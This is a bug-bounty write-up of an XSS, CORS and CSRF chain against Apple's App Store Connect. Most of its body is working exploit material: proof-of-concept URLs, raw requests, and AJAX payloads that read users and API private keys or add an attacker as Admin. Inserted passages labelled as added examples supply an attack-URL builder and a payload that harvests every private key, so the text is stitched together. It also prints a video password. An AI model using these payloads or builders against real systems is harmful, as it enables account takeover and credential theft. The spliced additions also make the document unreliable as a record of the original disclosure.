Account takeover of any user's Apple App Store Connect account and theft of any developer's API/subscription keys (CORS + XSS), worth $8500
Company Information :
Bug Category :
Cross-origin resource sharing (CORS) :
Cross-origin resource sharing (CORS) is a browser mechanism that lets a server relax the same-origin policy for its own responses: by returning Access-Control-Allow-Origin (and, for cookie-authenticated requests, Access-Control-Allow-Credentials: true) the server tells the browser that script running on another origin may read the response body. A web page can already embed cross-origin images, stylesheets, scripts, iframes and videos without CORS; what CORS additionally grants is the right to read the response, which is why an over-broad allowlist is dangerous.
Reflected Cross-site scripting (XSS) :
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable script into a page served by a trusted application or website. In the reflected form used here, the payload travels in the URL and is echoed back into the page, so attackers typically start by sending a malicious link to a user and enticing the user to click it.
Impact :
1. Theft of App Store Connect API keys with Full Access, subscription keys, the shared secret, etc.
2. Site-wide CSRF on https://appstoreconnect.apple.com
3. Read access to any detail of any user's App Store Connect account.
4. Complete takeover of any developer's App Store Connect account (by inviting an attacker-controlled Admin user).
Technical Details of the Bug :
1. Reflected XSS in http://ax.itunes.apple.com (the id parameter of /essentials) :
POC :
http://ax.itunes.apple.com/essentials?id="><script>alert(document.domain)</script>
http://ax.itunes.apple.com/essentials?id="><script>alert(document.cookie)</script>
Screenshot :
2. CORS misconfiguration in App Store Connect :
App Store Connect sets CORS headers on all of its API responses.
The policy accepts any origin under *.itunes.apple.com, with credentials: the PoCs below send the victim's cookies (withCredentials = true) and read the response body.
Hence script running on any subdomain of itunes.apple.com can read and write data on https://appstoreconnect.apple.com on behalf of a logged-in user.
Screenshot :
3. Weak CSRF protection in App Store Connect :
There is no proper CSRF protection in App Store Connect. The only checks are Origin validation and Content-Type validation; the x-csrf-itc header seen in the captured requests is not required, and the POST PoC below does not send it.
Chaining all three bugs :
http://ax.itunes.apple.com is an origin that https://appstoreconnect.apple.com accepts for CORS, and that same origin check is all that stands in for CSRF protection.
Hence the XSS on http://ax.itunes.apple.com gives an attacker script that can read data from and write data to https://appstoreconnect.apple.com with the victim's session: credentialed GETs return the response body, and a POST with Content-Type: application/vnd.api+json passes the preflight and the Origin check.
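The policy described in points 2 and 3 above, modelled as an added example (this is not Apple's code and not part of the original report): a vulnerable policy that trusts every *.itunes.apple.com origin with credentials and reuses that origin check as its CSRF defence, next to a hardened one. Hostnames and the endpoint come from the write-up; the policy objects, function names and the per-session csrfToken field are assumptions for illustration.

```javascript
// Added example, not Apple's code: a model of the two server-side checks the write-up
// describes (suffix-matched CORS allowlist with credentials, Origin + Content-Type as the
// only CSRF defence) next to a hardened policy. Hostnames are the page's; the policy shape,
// function names and the session "csrfToken" field are assumptions.

// Vulnerable policy: trusts every subdomain of itunes.apple.com, over http as well as https,
// and relies on that same origin check to block cross-site writes.
const vulnerablePolicy = {
  allowOrigin(origin) {
    let host;
    try { host = new URL(origin).hostname; } catch { return false; } // "null" or garbage Origin
    return host === "appstoreconnect.apple.com" ||
           host === "itunes.apple.com" || host.endsWith(".itunes.apple.com");
  },
  requireCsrfToken: false,
};

// Hardened policy: exact-match allowlist of the one origin that needs credentialed access,
// plus a per-session token that a script running on ax.itunes.apple.com cannot obtain.
const hardenedPolicy = {
  allowOrigin: (origin) => origin === "https://appstoreconnect.apple.com",
  requireCsrfToken: true,
};

// Response headers a preflight or actual request gets back under a policy (null = browser blocks the read).
function corsHeaders(policy, origin) {
  if (!policy.allowOrigin(origin)) return null;
  return {
    "Access-Control-Allow-Origin": origin,           // reflected, not "*": credentialed responses need it
    "Access-Control-Allow-Credentials": "true",      // cookies are sent and the body becomes readable
    "Access-Control-Allow-Headers": "Content-Type",  // lets application/vnd.api+json through preflight
    "Vary": "Origin",
  };
}

// Gate for a state-changing request such as POST /iris/v1/userInvitations.
function acceptStateChange(policy, req, session) {
  if (!req.cookie) return false;                                      // not authenticated
  if (!policy.allowOrigin(req.origin)) return false;                  // the Origin check
  if (req.contentType !== "application/vnd.api+json") return false;   // the Content-Type check
  if (policy.requireCsrfToken && req.csrfToken !== session.csrfToken) return false;
  return true;
}

// Constructed sample traffic: the attacker's request comes from the XSS'd origin and carries the
// victim's cookies; the legitimate one comes from the App Store Connect UI with its token.
const session = { cookie: "victim-session", csrfToken: "per-session-secret" };
const attackerReq = {
  origin: "http://ax.itunes.apple.com",
  cookie: session.cookie,
  contentType: "application/vnd.api+json",
  csrfToken: undefined,
};
const legitReq = { ...attackerReq, origin: "https://appstoreconnect.apple.com", csrfToken: session.csrfToken };

for (const [name, policy] of [["vulnerable", vulnerablePolicy], ["hardened", hardenedPolicy]]) {
  console.log(name, "read:", corsHeaders(policy, attackerReq.origin) !== null,
              "write:", acceptStateChange(policy, attackerReq, session));
}
```

Run with node: the loop prints `vulnerable read: true write: true` and `hardened read: false write: false`. An allowlist is only as strong as its weakest member: with a suffix match, one reflected XSS on any subdomain of itunes.apple.com, even one served over plain http, is enough to read and write on behalf of the victim. The fix is exact origins plus a CSRF token the foreign script cannot read.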
##Steps to reproduce and POCs :
How to capture the requests mentioned below :
1. Log in to an App Store Connect account.
2. Go to the account's people and keys pages (/access/users and /access/api in the captures below).
3. Watch the background requests with a proxy tool such as Burp Suite.
4. You will see all of the requests mentioned below.
Below are a few of those requests, the AJAX code that exploits each one, and the direct PoC URLs.
1. Access to user details :
Vulnerable HTTP Request :
```
GET /iris/v1/users?include=visibleApps,provider&limit=1000&sort=lastName&limit[visibleApps]=2000&fields[apps]= HTTP/1.1
Host: appstoreconnect.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/vnd.api+json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://appstoreconnect.apple.com/access/users
content-type: application/vnd.api+json
x-csrf-itc: [asc-ui]
Connection: close
Cookie: [cookies]
```
AJAX Request :
```
<script>
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
  if (this.readyState == 4 && this.status == 200) {
    alert(this.responseText); // readable cross-origin because ax.itunes.apple.com is an allowed origin
  }
};
xhttp.open("GET", "https://appstoreconnect.apple.com/iris/v1/users?include=visibleApps,provider&limit=1000&sort=lastName&limit[visibleApps]=2000&fields[apps]=", true);
xhttp.withCredentials = true; // send the victim's App Store Connect cookies
xhttp.send();
</script>
```
URL Encoded Attack URL :
http://ax.itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20%20%20%20%C2%A0var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20%20%20%20%C2%A0xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0Aalert(this.responseText)%3B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0%7D%0A%20%20%20%20%20%20%C2%A0%7D%3B%0A%20%20%20%20%20%20%C2%A0xhttp.open(%22GET%22%2C%20%22https%3A%2F%2Fappstoreconnect.apple.com%2Firis%2Fv1%2Fusers%3Finclude%3DvisibleApps%2Cprovider%26limit%3D1000%26sort%3DlastName%26limit%5BvisibleApps%5D%3D2000%26fields%5Bapps%5D%3D%22%2C%20true)%3B%0A%20%20%20%20%20%20%C2%A0xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20%20%20%20%C2%A0xhttp.send()%3B%0A%20%20%20%3C%2Fscript%3E
2. Access to API private keys :
Vulnerable HTTP Request :
```
GET /iris/v1/apiAccesses?include=requestedBy HTTP/1.1
Host: appstoreconnect.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/vnd.api+json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://appstoreconnect.apple.com/access/api
content-type: application/vnd.api+json
x-csrf-itc: [asc-ui]
Connection: close
Cookie: cookies
```
AJAX Request :
```
<script>
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
  if (this.readyState == 4 && this.status == 200) {
    alert(this.responseText); // lists every API key of the account, including key IDs
  }
};
xhttp.open("GET", "https://appstoreconnect.apple.com/iris/v1/apiKeys?include=createdBy,revokedBy,provider&sort=-isActive,-revokingDate&limit=500", true);
xhttp.withCredentials = true; // send the victim's App Store Connect cookies
xhttp.send();
</script>
```
URL Encoded Attack URL :
http://ax.itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20%20%20%20%C2%A0var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20%20%20%20%C2%A0xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0Aalert(this.responseText)%3B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0%7D%0A%20%20%20%20%20%20%C2%A0%7D%3B%0A%20%20%20%20%20%20%C2%A0xhttp.open(%22GET%22%2C%20%22https%3A%2F%2Fappstoreconnect.apple.com%2Firis%2Fv1%2FapiKeys%3Finclude%3DcreatedBy%2CrevokedBy%2Cprovider%26sort%3D-isActive%2C-revokingDate%26limit%3D500%22%2C%20true)%3B%0A%20%20%20%20%20%20%C2%A0xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20%20%20%20%C2%A0xhttp.send()%3B%0A%20%20%20%3C%2Fscript%3E
Vulnerable HTTP Request :
```
GET /iris/v1/apiKeys/ZM249W4T3V?fields[apiKeys]=privateKey HTTP/1.1
Host: appstoreconnect.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/vnd.api+json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://appstoreconnect.apple.com/access/api
content-type: application/vnd.api+json
x-csrf-itc: [asc-ui]
Connection: close
Cookie: cookies
```
AJAX Request :
```
<script>
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
  if (this.readyState == 4 && this.status == 200) {
    alert(this.responseText); // the private key material of the key selected by ID
  }
};
xhttp.open("GET", "https://appstoreconnect.apple.com/iris/v1/apiKeys/ZM249W4T3V?fields[apiKeys]=privateKey", true);
xhttp.withCredentials = true; // send the victim's App Store Connect cookies
xhttp.send();
</script>
```
URL Encoded Attack URL :
http://ax.itunes.apple.com/essentials?id=">%3Cscript%3E%0A%20%20%20%20%20%20%C2%A0var%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0A%20%20%20%20%20%20%C2%A0xhttp.onreadystatechange%20%3D%20function()%20%7B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0if%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0Aalert(this.responseText)%3B%0A%20%20%20%20%20%20%C2%A0%C2%A0%C2%A0%7D%0A%20%20%20%20%20%20%C2%A0%7D%3B%0A%20%20%20%20%20%20%C2%A0xhttp.open(%22GET%22%2C%20%22https%3A%2F%2Fappstoreconnect.apple.com%2Firis%2Fv1%2FapiKeys%2FZM249W4T3V%3Ffields%5BapiKeys%5D%3DprivateKey%22%2C%20true)%3B%0A%20%20%20%20%20%20%C2%A0xhttp.withCredentials%20%3D%20true%3B%0A%20%20%20%20%20%20%C2%A0xhttp.send()%3B%0A%20%20%20%3C%2Fscript%3E
3. Add the attacker as an Admin user of the account (CSRF attack) :
Vulnerable HTTP Request :
```
POST /iris/v1/userInvitations HTTP/1.1
Host: appstoreconnect.apple.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/vnd.api+json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/vnd.api+json
Content-Length: 192
x-csrf-itc: [asc-ui]
Origin: https://appstoreconnect.apple.com
Referer: https://appstoreconnect.apple.com/access/users
Connection: close
Cookie: [cookies]
{"data":{"type":"userInvitations","attributes":{"email":"attacker@gmail.com","firstName":"attacker","lastName":"attacker","roles":["ADMIN"],"provisioningAllowed":false,"allAppsVisible":true}}}
```
AJAX Request :
```
<script>
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
  if (this.readyState == 4 && this.status == 200) {
    alert(this.responseText);
  }
};
xhttp.open("POST", "https://appstoreconnect.apple.com/iris/v1/userInvitations", true);
// Content-Type is the only request header the server checks; it also triggers a CORS preflight,
// which the *.itunes.apple.com allowlist lets through. No x-csrf-itc header is sent.
xhttp.setRequestHeader("Content-Type", "application/vnd.api+json");
var data=JSON.stringify({"data":{"type":"userInvitations","attributes":{"email":"Attacker@gmail.com","firstName":"Attacker","lastName":"Attacker","roles":["ADMIN"],"provisioningAllowed":false,"allAppsVisible":true}}});
xhttp.withCredentials = true; // the victim's cookies ride along, so the invitation is issued from their account
xhttp.send(data);
</script>
```
URL Encoded Attack URL :
http://ax.itunes.apple.com/essentials?id=">%3Cscript%3E%0Avar%20xhttp%20%3D%20new%20XMLHttpRequest()%3B%0Axhttp.onreadystatechange%20%3D%20function()%20%7B%0Aif%20(this.readyState%20%3D%3D%204%20%26%26%20this.status%20%3D%3D%20200)%20%7B%0Aalert(this.responseText)%3B%0A%7D%0A%7D%3B%0Axhttp.open(%22POST%22%2C%20%22https%3A%2F%2Fappstoreconnect.apple.com%2Firis%2Fv1%2FuserInvitations%22%2C%20true)%3B%0Axhttp.setRequestHeader(%22Content-Type%22%2C%20%22application%2Fvnd.api%2Bjson%22)%3B%0Avar%20data%3DJSON.stringify(%7B%22data%22%3A%7B%22type%22%3A%22userInvitations%22%2C%22attributes%22%3A%7B%22email%22%3A%22Attacker%40gmail.com%22%2C%22firstName%22%3A%22Attacker%22%2C%22lastName%22%3A%22Attacker%22%2C%22roles%22%3A%5B%22ADMIN%22%5D%2C%22provisioningAllowed%22%3Afalse%2C%22allAppsVisible%22%3Atrue%7D%7D%7D)%3B%0Axhttp.withCredentials%20%3D%20true%3B%0Axhttp.send(data)%3B%0A%3C%2Fscript%3E%0A
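How the "URL Encoded Attack URL" lines above are produced from a script body, as an added example that is not part of the original write-up: a builder that wraps the script in the page's break-out prefix and percent-encodes it for the id parameter, its inverse for checking a crafted URL, and one payload that generalises requests 2a and 2b (list the keys, then read every key's privateKey instead of one hard-coded ID). The entry point, endpoints and query parameters are the page's; the helper names, the JSON:API list shape (data[].id) and console.log as the sink are assumptions.

```javascript
// Added example, not from the original report: builds and checks the percent-encoded attack URLs
// and shows the page's two key requests chained. Hostnames and endpoints come from the write-up;
// helper names, the JSON:API response shape and the console.log sink are assumptions.

const XSS_ENTRY = "http://ax.itunes.apple.com/essentials"; // reflected parameter: id
const ASC = "https://appstoreconnect.apple.com";

// Wraps a script body in the page's attribute break-out ("><script>...</script>) and encodes it
// for the id parameter. encodeURIComponent leaves ( ) ' ! ~ * - _ . alone and encodes "+" as %2B,
// so the value survives the server's form decoding unchanged.
function buildAttackUrl(script, entry = XSS_ENTRY, param = "id") {
  const payload = `"><script>${script}</script>`;
  return `${entry}?${param}=${encodeURIComponent(payload)}`;
}

// Inverse: recovers the script body from a crafted URL, or null if the URL is not in that shape.
function extractScript(url, param = "id") {
  const raw = new URL(url).searchParams.get(param) || "";
  const m = raw.match(/^"><script>([\s\S]*)<\/script>$/);
  return m ? m[1] : null;
}

// Payload that runs on ax.itunes.apple.com once reflected. fetch with credentials: "include" is the
// modern form of xhttp.withCredentials = true; the reads succeed only because of the CORS policy.
// Where the write-up calls alert(), this collects every key's private key and logs the result.
const CHAIN_PAYLOAD = `
(async () => {
  const opts = { credentials: "include", headers: { Accept: "application/vnd.api+json" } };
  const list = await (await fetch("${ASC}/iris/v1/apiKeys?limit=500", opts)).json();
  const keys = [];
  for (const k of list.data || []) {             // assumption: JSON:API list, each item has an id
    const r = await fetch("${ASC}/iris/v1/apiKeys/" + k.id + "?fields[apiKeys]=privateKey", opts);
    keys.push(await r.json());
  }
  console.log(JSON.stringify(keys));
})();`;

// Round-trip check before sending anything: the URL must decode back to exactly the script.
function attackUrlIsIntact(script) {
  return extractScript(buildAttackUrl(script)) === script;
}

console.log(buildAttackUrl("alert(document.domain)"));
console.log("chain payload survives encoding:", attackUrlIsIntact(CHAIN_PAYLOAD));
```

The first line printed is the same URL as the page's first PoC with the break-out characters encoded as well (%22%3E%3Cscript%3E...), which is what a browser or a proxy would do to the literal `">` anyway. The round-trip check matters for long payloads such as CHAIN_PAYLOAD: newlines, quotes and square brackets in the query string are all reasons a hand-built URL silently breaks.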
#Video Proof of concept :
I am attaching a password-protected video from my Vimeo account.
Link : https://vimeo.com/559575046
Password : h1test1110@
June 7th 2021 : Report sent to the Apple Product Security team through email.
June 7th 2021 : Report accepted and triaged.
June 8th 2021 : Partial fix released by fixing the XSS part.
July 21st 2021 : Complete issue resolved and confirmed.
August 31st 2021 : $8500 bounty rewarded.
